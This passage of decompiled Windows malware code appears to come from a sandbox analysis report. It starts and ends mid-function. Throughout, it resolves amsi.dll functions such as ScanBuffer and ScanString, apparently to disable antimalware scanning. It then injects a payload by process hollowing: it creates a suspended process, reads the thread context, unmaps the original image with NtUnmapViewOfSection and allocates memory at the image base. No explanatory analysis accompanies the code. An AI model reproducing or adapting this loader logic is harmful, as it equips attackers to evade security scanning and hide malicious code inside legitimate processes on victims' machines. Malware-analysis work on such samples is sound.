                                                                                                  				char _v476;
                                                                                                  				char _v480;
                                                                                                  				intOrPtr _v484;
                                                                                                  				char _v488;
                                                                                                  				char _v492;
                                                                                                  				char _v496;
                                                                                                  				intOrPtr _v500;
                                                                                                  				char _v504;
                                                                                                  				char _v508;
                                                                                                  				char _v512;
                                                                                                  				intOrPtr _v516;
                                                                                                  				char _v520;
                                                                                                  				char _v524;
                                                                                                  				char _v528;
                                                                                                  				intOrPtr _v532;
                                                                                                  				char _v536;
                                                                                                  				char _v540;
                                                                                                  				char _v544;
                                                                                                  				intOrPtr _v548;
                                                                                                  				char _v552;
                                                                                                  				char _v556;
                                                                                                  				char _v560;
                                                                                                  				intOrPtr _v564;
                                                                                                  				char _v568;
                                                                                                  				char _v572;
                                                                                                  				char _v576;
                                                                                                  				intOrPtr _v580;
                                                                                                  				char _v584;
                                                                                                  				char _v588;
                                                                                                  				char _v592;
                                                                                                  				intOrPtr _v596;
                                                                                                  				char _v600;
                                                                                                  				char _v604;
                                                                                                  				char _v608;
                                                                                                  				intOrPtr _v612;
                                                                                                  				char _v616;
                                                                                                  				char _v620;
                                                                                                  				char _v624;
                                                                                                  				intOrPtr _v628;
                                                                                                  				char _v632;
                                                                                                  				char _v636;
                                                                                                  				char _v640;
                                                                                                  				intOrPtr _v644;
                                                                                                  				char _v648;
                                                                                                  				char _v652;
                                                                                                  				char _v656;
                                                                                                  				intOrPtr _v660;
                                                                                                  				char _v664;
                                                                                                  				char _v668;
                                                                                                  				char _v672;
                                                                                                  				intOrPtr _v676;
                                                                                                  				char _v680;
                                                                                                  				char _v684;
                                                                                                  				char _v688;
                                                                                                  				intOrPtr _v692;
                                                                                                  				char _v696;
                                                                                                  				char _v700;
                                                                                                  				char _v704;
                                                                                                  				intOrPtr _v708;
                                                                                                  				char _v712;
                                                                                                  				char _v716;
                                                                                                  				char _v720;
                                                                                                  				intOrPtr _v724;
                                                                                                  				char _v728;
                                                                                                  				char _v732;
                                                                                                  				char _v736;
                                                                                                  				intOrPtr _v740;
                                                                                                  				char _v744;
                                                                                                  				char _v748;
                                                                                                  				char _v752;
                                                                                                  				intOrPtr _v756;
                                                                                                  				char _v760;
                                                                                                  				char _v764;
                                                                                                  				char _v768;
                                                                                                  				intOrPtr _v772;
                                                                                                  				char _v776;
                                                                                                  				char _v780;
                                                                                                  				char _v784;
                                                                                                  				intOrPtr _v788;
                                                                                                  				char _v792;
                                                                                                  				char _v796;
                                                                                                  				char _v800;
                                                                                                  				intOrPtr _v804;
                                                                                                  				char _v808;
                                                                                                  				char _v812;
                                                                                                  				char _v816;
                                                                                                  				intOrPtr _v820;
                                                                                                  				char _v824;
                                                                                                  				char _v828;
                                                                                                  				char _v832;
                                                                                                  				intOrPtr _v836;
                                                                                                  				char _v840;
                                                                                                  				char _v844;
                                                                                                  				char _v848;
                                                                                                  				intOrPtr _v852;
                                                                                                  				char _v856;
                                                                                                  				char _v860;
                                                                                                  				char _v864;
                                                                                                  				intOrPtr _v868;
                                                                                                  				char _v872;
                                                                                                  				char _v876;
                                                                                                  				char _v880;
                                                                                                  				intOrPtr _v884;
                                                                                                  				char _v888;
                                                                                                  				char _v892;
                                                                                                  				char _v896;
                                                                                                  				intOrPtr _v900;
                                                                                                  				char _v904;
                                                                                                  				char _v908;
                                                                                                  				char _v912;
                                                                                                  				intOrPtr _v916;
                                                                                                  				char _v920;
                                                                                                  				char _v924;
                                                                                                  				char _v928;
                                                                                                  				intOrPtr _v932;
                                                                                                  				char _v936;
                                                                                                  				char _v940;
                                                                                                  				char _v944;
                                                                                                  				intOrPtr _v948;
                                                                                                  				char _v952;
                                                                                                  				char _v956;
                                                                                                  				char _v960;
                                                                                                  				intOrPtr _v964;
                                                                                                  				char _v968;
                                                                                                  				char _v972;
                                                                                                  				short* _t596;
                                                                                                  				intOrPtr _t607;
                                                                                                  				intOrPtr* _t610;
                                                                                                  				WCHAR* _t670;
                                                                                                  				void* _t671;
                                                                                                  				int _t672;
                                                                                                  				struct _EXCEPTION_RECORD _t701;
                                                                                                  				struct _EXCEPTION_RECORD _t745;
                                                                                                  				HANDLE* _t746;
                                                                                                  				void* _t790;
                                                                                                  				int _t791;
                                                                                                  				intOrPtr _t820;
                                                                                                  				void* _t822;
                                                                                                  				intOrPtr _t824;
                                                                                                  				intOrPtr _t868;
                                                                                                  				intOrPtr _t870;
                                                                                                  				void* _t872;
                                                                                                  				void _t873;
                                                                                                  				intOrPtr _t918;
                                                                                                  				intOrPtr _t990;
                                                                                                  				void* _t992;
                                                                                                  				void* _t993;
                                                                                                  				intOrPtr _t995;
                                                                                                  				void _t997;
                                                                                                  				void* _t998;
                                                                                                  				intOrPtr _t1069;
                                                                                                  				void* _t1071;
                                                                                                  				intOrPtr _t1143;
                                                                                                  				void* _t1174;
                                                                                                  				void* _t1246;
                                                                                                  				void* _t1279;
                                                                                                  				void* _t1281;
                                                                                                  				void* _t1283;
                                                                                                  				intOrPtr _t1327;
                                                                                                  				intOrPtr _t1328;
                                                                                                  				intOrPtr _t1330;
                                                                                                  				intOrPtr _t1332;
                                                                                                  				intOrPtr _t1378;
                                                                                                  				void* _t1380;
                                                                                                  				long _t1381;
                                                                                                  				intOrPtr _t1424;
                                                                                                  				void* _t1426;
                                                                                                  				void _t1427;
                                                                                                  				intOrPtr _t1428;
                                                                                                  				intOrPtr _t1430;
                                                                                                  				void* _t1432;
                                                                                                  				void _t1433;
                                                                                                  				void* _t1450;
                                                                                                  				void* _t1524;
                                                                                                  				void* _t1529;
                                                                                                  				void* _t1534;
                                                                                                  				void* _t1539;
                                                                                                  				void* _t1544;
                                                                                                  				void* _t1549;
                                                                                                  				intOrPtr _t1550;
                                                                                                  				void* _t1559;
                                                                                                  				void* _t1564;
                                                                                                  				void* _t1569;
                                                                                                  				void* _t1574;
                                                                                                  				void* _t1580;
                                                                                                  				void* _t1585;
                                                                                                  				void* _t1591;
                                                                                                  				void* _t1596;
                                                                                                  				void* _t1601;
                                                                                                  				void* _t1606;
                                                                                                  				void* _t1611;
                                                                                                  				void* _t1616;
                                                                                                  				void* _t1621;
                                                                                                  				void* _t1626;
                                                                                                  				void* _t1631;
                                                                                                  				void* _t1636;
                                                                                                  				void* _t1641;
                                                                                                  				void* _t1646;
                                                                                                  				void* _t1651;
                                                                                                  				void* _t1656;
                                                                                                  				void* _t1661;
                                                                                                  				void* _t1666;
                                                                                                  				void* _t1671;
                                                                                                  				void* _t1676;
                                                                                                  				void* _t1681;
                                                                                                  				void* _t1686;
                                                                                                  				void* _t1691;
                                                                                                  				void* _t1696;
                                                                                                  				void* _t1701;
                                                                                                  				void* _t1706;
                                                                                                  				void* _t1711;
                                                                                                  				void* _t1716;
                                                                                                  				void* _t1721;
                                                                                                  				void* _t1726;
                                                                                                  				void* _t1731;
                                                                                                  				void* _t1736;
                                                                                                  				void* _t1741;
                                                                                                  				void* _t1746;
                                                                                                  				void* _t1751;
                                                                                                  				void* _t1756;
                                                                                                  				void* _t1761;
                                                                                                  				void* _t1766;
                                                                                                  				void* _t1772;
                                                                                                  				void* _t1777;
                                                                                                  				void* _t1785;
                                                                                                  				void* _t1790;
                                                                                                  				void* _t1795;
                                                                                                  				void _t1796;
                                                                                                  				void _t1798;
                                                                                                  				intOrPtr _t1800;
                                                                                                  				void* _t1805;
                                                                                                  				void* _t1810;
                                                                                                  				void* _t1815;
                                                                                                  				void* _t1820;
                                                                                                  				void* _t1825;
                                                                                                  				void* _t1830;
                                                                                                  				void* _t1835;
                                                                                                  				intOrPtr _t1840;
                                                                                                  				void* _t1841;
                                                                                                  				intOrPtr _t1843;
                                                                                                  				intOrPtr _t1844;
                                                                                                  				void* _t1852;
                                                                                                  				void* _t1855;
                                                                                                  				void* _t1859;
                                                                                                  
                                                                                                  				_t1859 = __fp0;
                                                                                                  				_t1843 = _t1844;
                                                                                                  				_t1450 = 0x79;
                                                                                                  				do {
                                                                                                  					_push(0);
                                                                                                  					_push(0);
                                                                                                  					_t1450 = _t1450 - 1;
                                                                                                  				} while (_t1450 != 0);
                                                                                                  				_t1840 = __edx;
                                                                                                  				_v8 = __eax;
                                                                                                  				E02854954(_v8);
                                                                                                  				_push(_t1843);
                                                                                                  				_push(0x286ba6b);
                                                                                                  				_push( *[fs:eax]);
                                                                                                  				 *[fs:eax] = _t1844;
                                                                                                  				E028544F4(0x28a63d4, 0x286ba84);
                                                                                                  				_push(0x286ba90);
                                                                                                  				_push( *0x28a63d4);
                                                                                                  				_push("OpenSession");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v12, E02854964(_v16));
                                                                                                  				_push(_v12);
                                                                                                  				E028547B0( &_v24,  *0x28a63d4, 0x286ba90);
                                                                                                  				E02854698( &_v20, E02854964(_v24));
                                                                                                  				_pop(_t1524); // executed
                                                                                                  				E02867B80(_v20, _t1524); // executed
                                                                                                  				_push(0x286ba90);
                                                                                                  				_push( *0x28a63d4);
                                                                                                  				_push("ScanBuffer");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v28, E02854964(_v32));
                                                                                                  				_push(_v28);
                                                                                                  				E028547B0( &_v40,  *0x28a63d4, 0x286ba90);
                                                                                                  				E02854698( &_v36, E02854964(_v40));
                                                                                                  				_pop(_t1529); // executed
                                                                                                  				E02867B80(_v36, _t1529); // executed
                                                                                                  				_push(0x286ba90);
                                                                                                  				_push( *0x28a63d4);
                                                                                                  				_push("Initialize");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v44, E02854964(_v48));
                                                                                                  				_push(_v44);
                                                                                                  				E028547B0( &_v56,  *0x28a63d4, 0x286ba90);
                                                                                                  				E02854698( &_v52, E02854964(_v56));
                                                                                                  				_pop(_t1534); // executed
                                                                                                  				E02867B80(_v52, _t1534); // executed
                                                                                                  				_push(0x286ba90);
                                                                                                  				_push( *0x28a63d4);
                                                                                                  				_push("Initialize");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v60, E02854964(_v64));
                                                                                                  				_push(_v60);
                                                                                                  				E028547B0( &_v72,  *0x28a63d4, 0x286ba90);
                                                                                                  				E02854698( &_v68, E02854964(_v72));
                                                                                                  				_pop(_t1539); // executed
                                                                                                  				E02867B80(_v68, _t1539); // executed
                                                                                                  				_push(0x286ba90);
                                                                                                  				_push( *0x28a63d4);
                                                                                                  				_push("ScanString");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v76, E02854964(_v80));
                                                                                                  				_push(_v76);
                                                                                                  				E028547B0( &_v88,  *0x28a63d4, 0x286ba90);
                                                                                                  				E02854698( &_v84, E02854964(_v88));
                                                                                                  				_pop(_t1544); // executed
                                                                                                  				E02867B80(_v84, _t1544); // executed
                                                                                                  				_push(0x286ba90);
                                                                                                  				_push( *0x28a63d4);
                                                                                                  				_push("ScanBuffer");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v92, E02854964(_v96));
                                                                                                  				_push(_v92);
                                                                                                  				E028547B0( &_v104,  *0x28a63d4, 0x286ba90);
                                                                                                  				E02854698( &_v100, E02854964(_v104));
                                                                                                  				_pop(_t1549); // executed
                                                                                                  				E02867B80(_v100, _t1549); // executed
                                                                                                  				 *0x28a651c = _t1840;
                                                                                                  				_t596 =  *0x28a651c; // 0x7ebd0018
                                                                                                  				if( *_t596 != 0x5a4d) {
                                                                                                  					L17:
                                                                                                  					_pop(_t1550);
                                                                                                  					 *[fs:eax] = _t1550;
                                                                                                  					_push(0x286ba72);
                                                                                                  					E028544C4( &_v972, 0x64);
                                                                                                  					E028544C4( &_v572, 0x64);
                                                                                                  					E02854C24( &_v172);
                                                                                                  					return E028544C4( &_v168, 0x29);
                                                                                                  				}
                                                                                                  				_push(0);
                                                                                                  				_push(_t1840);
                                                                                                  				_t607 =  *0x28a651c; // 0x7ebd0018
                                                                                                  				_t51 = _t607 + 0x3c; // 0x110
                                                                                                  				asm("cdq");
                                                                                                  				asm("adc edx, [esp+0x4]");
                                                                                                  				 *0x28a6520 =  *_t51 + _v116;
                                                                                                  				_t610 =  *0x28a6520; // 0x7ebd0128
                                                                                                  				if( *_t610 != 0x4550) {
                                                                                                  					goto L17;
                                                                                                  				}
                                                                                                  				_push(0x286ba90);
                                                                                                  				_push( *0x28a63d4);
                                                                                                  				_push("UacInitialize");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v108, E02854964(_v112));
                                                                                                  				_push(_v108);
                                                                                                  				E028547B0( &_v120,  *0x28a63d4, 0x286ba90);
                                                                                                  				E02854698( &_v116, E02854964(_v120));
                                                                                                  				_pop(_t1559); // executed
                                                                                                  				E02867B80(_v116, _t1559); // executed
                                                                                                  				_push(0x286ba90);
                                                                                                  				_push( *0x28a63d4);
                                                                                                  				_push("UacScan");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v124, E02854964(_v128));
                                                                                                  				_push(_v124);
                                                                                                  				E028547B0( &_v136,  *0x28a63d4, 0x286ba90);
                                                                                                  				E02854698( &_v132, E02854964(_v136));
                                                                                                  				_pop(_t1564); // executed
                                                                                                  				E02867B80(_v132, _t1564); // executed
                                                                                                  				_push(0x286ba90);
                                                                                                  				_push( *0x28a63d4);
                                                                                                  				_push("Initialize");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v140, E02854964(_v144));
                                                                                                  				_push(_v140);
                                                                                                  				E028547B0( &_v152,  *0x28a63d4, 0x286ba90);
                                                                                                  				E02854698( &_v148, E02854964(_v152));
                                                                                                  				_pop(_t1569); // executed
                                                                                                  				E02867B80(_v148, _t1569); // executed
                                                                                                  				_push(0x286ba90);
                                                                                                  				_push( *0x28a63d4);
                                                                                                  				_push("ScanString");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v156, E02854964(_v160));
                                                                                                  				_push(_v156);
                                                                                                  				E028547B0( &_v168,  *0x28a63d4, 0x286ba90);
                                                                                                  				E02854698( &_v164, E02854964(_v168));
                                                                                                  				_pop(_t1574); // executed
                                                                                                  				E02867B80(_v164, _t1574); // executed
                                                                                                  				E02854DA4( &_v172, _v8);
                                                                                                  				_t670 = E02854DB4(_v172);
                                                                                                  				_t671 =  *0x28a63dc; // 0x0
                                                                                                  				_t672 = CreateProcessAsUserW(_t671, 0, _t670, 0, 0, 0, 4, 0, 0, 0x28a640c, 0x28a63fc); // executed
                                                                                                  				if(_t672 != 0) {
                                                                                                  					_push(0x286ba90);
                                                                                                  					_push( *0x28a63d4);
                                                                                                  					_push("ScanBuffer");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v176, E02854964(_v180));
                                                                                                  					_push(_v176);
                                                                                                  					E028547B0( &_v188,  *0x28a63d4, 0x286ba90);
                                                                                                  					E02854698( &_v184, E02854964(_v188));
                                                                                                  					_pop(_t1835); // executed
                                                                                                  					E02867B80(_v184, _t1835); // executed
                                                                                                  				}
                                                                                                  				_push(0x286ba90);
                                                                                                  				_push( *0x28a63d4);
                                                                                                  				_push("UacInitialize");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v192, E02854964(_v196));
                                                                                                  				_push(_v192);
                                                                                                  				E028547B0( &_v204,  *0x28a63d4, 0x286ba90);
                                                                                                  				E02854698( &_v200, E02854964(_v204));
                                                                                                  				_pop(_t1580); // executed
                                                                                                  				E02867B80(_v200, _t1580); // executed
                                                                                                  				_push(0x286ba90);
                                                                                                  				_push( *0x28a63d4);
                                                                                                  				_push("OpenSession");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v208, E02854964(_v212));
                                                                                                  				_push(_v208);
                                                                                                  				E028547B0( &_v220,  *0x28a63d4, 0x286ba90);
                                                                                                  				E02854698( &_v216, E02854964(_v220));
                                                                                                  				_pop(_t1585); // executed
                                                                                                  				E02867B80(_v216, _t1585); // executed
                                                                                                  				_t701 =  *0x28a2c1c; // 0x28a6324
                                                                                                  				E02867AF4(_t701, 0x40, 0, 0, 0);
                                                                                                  				_push(0x286ba90);
                                                                                                  				_push( *0x28a63d4);
                                                                                                  				_push("UacInitialize");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v224, E02854964(_v228));
                                                                                                  				_push(_v224);
                                                                                                  				E028547B0( &_v236,  *0x28a63d4, 0x286ba90);
                                                                                                  				E02854698( &_v232, E02854964(_v236));
                                                                                                  				_pop(_t1591); // executed
                                                                                                  				E02867B80(_v232, _t1591); // executed
                                                                                                  				_push(0x286ba90);
                                                                                                  				_push( *0x28a63d4);
                                                                                                  				_push("ScanString");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v240, E02854964(_v244));
                                                                                                  				_push(_v240);
                                                                                                  				E028547B0( &_v252,  *0x28a63d4, 0x286ba90);
                                                                                                  				E02854698( &_v248, E02854964(_v252));
                                                                                                  				_pop(_t1596); // executed
                                                                                                  				E02867B80(_v248, _t1596); // executed
                                                                                                  				_push(0x286ba90);
                                                                                                  				_push( *0x28a63d4);
                                                                                                  				_push("OpenSession");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v256, E02854964(_v260));
                                                                                                  				_push(_v256);
                                                                                                  				E028547B0( &_v268,  *0x28a63d4, 0x286ba90);
                                                                                                  				E02854698( &_v264, E02854964(_v268));
                                                                                                  				_pop(_t1601); // executed
                                                                                                  				E02867B80(_v264, _t1601); // executed
                                                                                                  				_t745 =  *0x28a2c1c; // 0x28a6324
                                                                                                  				_t746 = 0x28a63fc->hProcess; // 0x8b8
                                                                                                  				NtCreateProcess(_t746, 0x1f0fff, _t745, 0, 1, 0, 0, 0); // executed
                                                                                                  				_push(0x286ba90);
                                                                                                  				_push( *0x28a63d4);
                                                                                                  				_push("ScanBuffer");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v272, E02854964(_v276));
                                                                                                  				_push(_v272);
                                                                                                  				E028547B0( &_v284,  *0x28a63d4, 0x286ba90);
                                                                                                  				E02854698( &_v280, E02854964(_v284));
                                                                                                  				_pop(_t1606); // executed
                                                                                                  				E02867B80(_v280, _t1606); // executed
                                                                                                  				_push(0x286ba90);
                                                                                                  				_push( *0x28a63d4);
                                                                                                  				_push("UacInitialize");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v288, E02854964(_v292));
                                                                                                  				_push(_v288);
                                                                                                  				E028547B0( &_v300,  *0x28a63d4, 0x286ba90);
                                                                                                  				E02854698( &_v296, E02854964(_v300));
                                                                                                  				_pop(_t1611); // executed
                                                                                                  				E02867B80(_v296, _t1611); // executed
                                                                                                  				_push(0x286ba90);
                                                                                                  				_push( *0x28a63d4);
                                                                                                  				_push("OpenSession");
                                                                                                  				E02854824();
                                                                                                  				E02854698( &_v304, E02854964(_v308));
                                                                                                  				_push(_v304);
                                                                                                  				E028547B0( &_v316,  *0x28a63d4, 0x286ba90);
                                                                                                  				E02854698( &_v312, E02854964(_v316));
                                                                                                  				_pop(_t1616); // executed
                                                                                                  				E02867B80(_v312, _t1616); // executed
                                                                                                  				0x28a6450->ContextFlags = 0x10007;
                                                                                                  				_t790 =  *0x28a6400; // 0x8bc
                                                                                                  				_t791 = GetThreadContext(_t790, 0x28a6450); // executed
                                                                                                  				if(_t791 != 0) {
                                                                                                  					_push(0x286ba90);
                                                                                                  					_push( *0x28a63d4);
                                                                                                  					_push("UacInitialize");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v320, E02854964(_v324));
                                                                                                  					_push(_v320);
                                                                                                  					E028547B0( &_v332,  *0x28a63d4, 0x286ba90);
                                                                                                  					E02854698( &_v328, E02854964(_v332));
                                                                                                  					_pop(_t1621); // executed
                                                                                                  					E02867B80(_v328, _t1621); // executed
                                                                                                  					_push(0x286ba90);
                                                                                                  					_push( *0x28a63d4);
                                                                                                  					_push("ScanBuffer");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v336, E02854964(_v340));
                                                                                                  					_push(_v336);
                                                                                                  					E028547B0( &_v348,  *0x28a63d4, 0x286ba90);
                                                                                                  					E02854698( &_v344, E02854964(_v348));
                                                                                                  					_pop(_t1626); // executed
                                                                                                  					E02867B80(_v344, _t1626); // executed
                                                                                                  					_t820 =  *0x28a64f4; // 0x31c000
                                                                                                  					_t822 = 0x28a63fc->hProcess; // 0x8b8
                                                                                                  					NtReadVirtualMemory(_t822, _t820 + 8, 0x28a6524, 4, 0x28a652c);
                                                                                                  					_t824 =  *0x28a6520; // 0x7ebd0128
                                                                                                  					_t175 = _t824 + 0x34; // 0x400000
                                                                                                  					_t1852 =  *_t175 -  *0x28a6524; // 0x400000
                                                                                                  					if(_t1852 != 0) {
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("ScanBuffer");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v448, E02854964(_v452));
                                                                                                  						_push(_v448);
                                                                                                  						E028547B0( &_v460,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v456, E02854964(_v460));
                                                                                                  						_pop(_t1631);
                                                                                                  						E02867B80(_v456, _t1631);
                                                                                                  					} else {
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("ScanBuffer");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v352, E02854964(_v356));
                                                                                                  						_push(_v352);
                                                                                                  						E028547B0( &_v364,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v360, E02854964(_v364));
                                                                                                  						_pop(_t1805); // executed
                                                                                                  						E02867B80(_v360, _t1805); // executed
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("UacInitialize");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v368, E02854964(_v372));
                                                                                                  						_push(_v368);
                                                                                                  						E028547B0( &_v380,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v376, E02854964(_v380));
                                                                                                  						_pop(_t1810); // executed
                                                                                                  						E02867B80(_v376, _t1810); // executed
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("OpenSession");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v384, E02854964(_v388));
                                                                                                  						_push(_v384);
                                                                                                  						E028547B0( &_v396,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v392, E02854964(_v396));
                                                                                                  						_pop(_t1815); // executed
                                                                                                  						E02867B80(_v392, _t1815);
                                                                                                  						_t1378 =  *0x28a6520; // 0x7ebd0128
                                                                                                  						_t200 = _t1378 + 0x34; // 0x400000
                                                                                                  						_t1380 = 0x28a63fc->hProcess; // 0x8b8
                                                                                                  						_t1381 = NtUnmapViewOfSection(_t1380,  *_t200); // executed
                                                                                                  						if(_t1381 != 0) {
                                                                                                  							_push(0x286ba90);
                                                                                                  							_push( *0x28a63d4);
                                                                                                  							_push("ScanBuffer");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v400, E02854964(_v404));
                                                                                                  							_push(_v400);
                                                                                                  							E028547B0( &_v412,  *0x28a63d4, 0x286ba90);
                                                                                                  							E02854698( &_v408, E02854964(_v412));
                                                                                                  							_pop(_t1820);
                                                                                                  							E02867B80(_v408, _t1820);
                                                                                                  						} else {
                                                                                                  							_t1428 =  *0x28a6520; // 0x7ebd0128
                                                                                                  							_t201 = _t1428 + 0x50; // 0x81000
                                                                                                  							_t1430 =  *0x28a6520; // 0x7ebd0128
                                                                                                  							_t202 = _t1430 + 0x34; // 0x400000
                                                                                                  							_t1432 = 0x28a63fc->hProcess; // 0x8b8
                                                                                                  							_t1433 = E028679CC(_t1432,  *_t202,  *_t201, 0x3000, 4); // executed
                                                                                                  							 *0x28a6528 = _t1433;
                                                                                                  						}
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("UacInitialize");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v416, E02854964(_v420));
                                                                                                  						_push(_v416);
                                                                                                  						E028547B0( &_v428,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v424, E02854964(_v428));
                                                                                                  						_pop(_t1825); // executed
                                                                                                  						E02867B80(_v424, _t1825); // executed
                                                                                                  						_push(0x286ba90);
                                                                                                  						_push( *0x28a63d4);
                                                                                                  						_push("OpenSession");
                                                                                                  						E02854824();
                                                                                                  						E02854698( &_v432, E02854964(_v436));
                                                                                                  						_push(_v432);
                                                                                                  						E028547B0( &_v444,  *0x28a63d4, 0x286ba90);
                                                                                                  						E02854698( &_v440, E02854964(_v444));
                                                                                                  						_pop(_t1830); // executed
                                                                                                  						E02867B80(_v440, _t1830); // executed
                                                                                                  						_t1424 =  *0x28a6520; // 0x7ebd0128
                                                                                                  						_t227 = _t1424 + 0x50; // 0x81000
                                                                                                  						_t1426 = 0x28a63fc->hProcess; // 0x8b8
                                                                                                  						_t1427 = E028679CC(_t1426, 0,  *_t227, 0x3000, 4); // executed
                                                                                                  						 *0x28a6528 = _t1427;
                                                                                                  					}
                                                                                                  					_push(0x286ba90);
                                                                                                  					_push( *0x28a63d4);
                                                                                                  					_push("UacInitialize");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v464, E02854964(_v468));
                                                                                                  					_push(_v464);
                                                                                                  					E028547B0( &_v476,  *0x28a63d4, 0x286ba90);
                                                                                                  					E02854698( &_v472, E02854964(_v476));
                                                                                                  					_pop(_t1636); // executed
                                                                                                  					E02867B80(_v472, _t1636); // executed
                                                                                                  					_push(0x286ba90);
                                                                                                  					_push( *0x28a63d4);
                                                                                                  					_push("OpenSession");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v480, E02854964(_v484));
                                                                                                  					_push(_v480);
                                                                                                  					E028547B0( &_v492,  *0x28a63d4, 0x286ba90);
                                                                                                  					E02854698( &_v488, E02854964(_v492));
                                                                                                  					_pop(_t1641); // executed
                                                                                                  					E02867B80(_v488, _t1641); // executed
                                                                                                  					_t868 =  *0x28a6520; // 0x7ebd0128
                                                                                                  					_t252 = _t868 + 0x50; // 0x81000
                                                                                                  					_t870 =  *0x28a6520; // 0x7ebd0128
                                                                                                  					_t253 = _t870 + 0x34; // 0x400000
                                                                                                  					_t872 = 0x28a63fc->hProcess; // 0x8b8
                                                                                                  					_t873 = E028679CC(_t872,  *_t253,  *_t252, 0x3000, 4); // executed
                                                                                                  					 *0x28a6528 = _t873;
                                                                                                  					_push(0x286ba90);
                                                                                                  					_push( *0x28a63d4);
                                                                                                  					_push("ScanBuffer");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v496, E02854964(_v500));
                                                                                                  					_push(_v496);
                                                                                                  					E028547B0( &_v508,  *0x28a63d4, 0x286ba90);
                                                                                                  					E02854698( &_v504, E02854964(_v508));
                                                                                                  					_pop(_t1646); // executed
                                                                                                  					E02867B80(_v504, _t1646); // executed
                                                                                                  					_push(0x286ba90);
                                                                                                  					_push( *0x28a63d4);
                                                                                                  					_push("UacInitialize");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v512, E02854964(_v516));
                                                                                                  					_push(_v512);
                                                                                                  					E028547B0( &_v524,  *0x28a63d4, 0x286ba90);
                                                                                                  					E02854698( &_v520, E02854964(_v524));
                                                                                                  					_pop(_t1651); // executed
                                                                                                  					E02867B80(_v520, _t1651); // executed
                                                                                                  					_push(0x286ba90);
                                                                                                  					_push( *0x28a63d4);
                                                                                                  					_push("OpenSession");
                                                                                                  					E02854824();
                                                                                                  					E02854698( &_v528, E02854964(_v532));
                                                                                                  					_push(_v528);
                                                                                                  					E028547B0( &_v540,  *0x28a63d4, 0x286ba90);
                                                                                                  					E02854698( &_v536, E02854964(_v540));
                                                                                                  					_pop(_t1656); // executed
                                                                                                  					E02867B80(_v536, _t1656); // executed
                                                                                                  					if( *0x28a6528 != 0) {
                                                                                                  						_t1841 = E02869C30(_t1840, _t1859);
                                                                                                  						_t918 =  *0x28a6520; // 0x7ebd0128
                                                                                                  						_t278 = _t918 + 0x34; // 0x400000
                                                                                                  						_t1855 =  *_t278 -  *0x28a6528; // 0x400000
                                                                                                  						if(_t1855 != 0) {
                                                                                                  							_push(0x286ba90);
                                                                                                  							_push( *0x28a63d4);
                                                                                                  							_push("ScanBuffer");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v544, E02854964(_v548));
                                                                                                  							_push(_v544);
                                                                                                  							E028547B0( &_v556,  *0x28a63d4, 0x286ba90);
                                                                                                  							E02854698( &_v552, E02854964(_v556));
                                                                                                  							_pop(_t1785);
                                                                                                  							E02867B80(_v552, _t1785);
                                                                                                  							_push(0x286ba90);
                                                                                                  							_push( *0x28a63d4);
                                                                                                  							_push("UacInitialize");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v560, E02854964(_v564));
                                                                                                  							_push(_v560);
                                                                                                  							E028547B0( &_v572,  *0x28a63d4, 0x286ba90);
                                                                                                  							E02854698( &_v568, E02854964(_v572));
                                                                                                  							_pop(_t1790);
                                                                                                  							E02867B80(_v568, _t1790);
                                                                                                  							_push(0x286ba90);
                                                                                                  							_push( *0x28a63d4);
                                                                                                  							_push("OpenSession");
                                                                                                  							E02854824();
                                                                                                  							E02854698( &_v576, E02854964(_v580));
                                                                                                  							_push(_v576);
                                                                                                  							E028547B0( &_v588,  *0x28a63d4, 0x286ba90);
                                                                                                  							E02854698( &_v584, E02854964(_v588));
                                                                                                  							_pop(_t1795);
                                                                                                  							E02867B80(_v584, _t1795);
                                                                                                  							_t1327 =  *0x28a6520; // 0x7ebd0128
                                                                                                  							_t1796 =  *0x28a6528; // 0x400000
                                                                                                  							_t303 = _t1327 + 0x34; // 0x400000
                                                                                                  							_t1328 =  *0x28a6520; // 0x7ebd0128
                                                                                                  							E02869B28(_t1859, _t1841, _t1328, _t1796 -  *_t303);
                                                                                                  							_t1330 =  *0x28a6520; // 0x7ebd0128
                                                                                                  							_t1798 =  *0x28a6528; // 0x400000
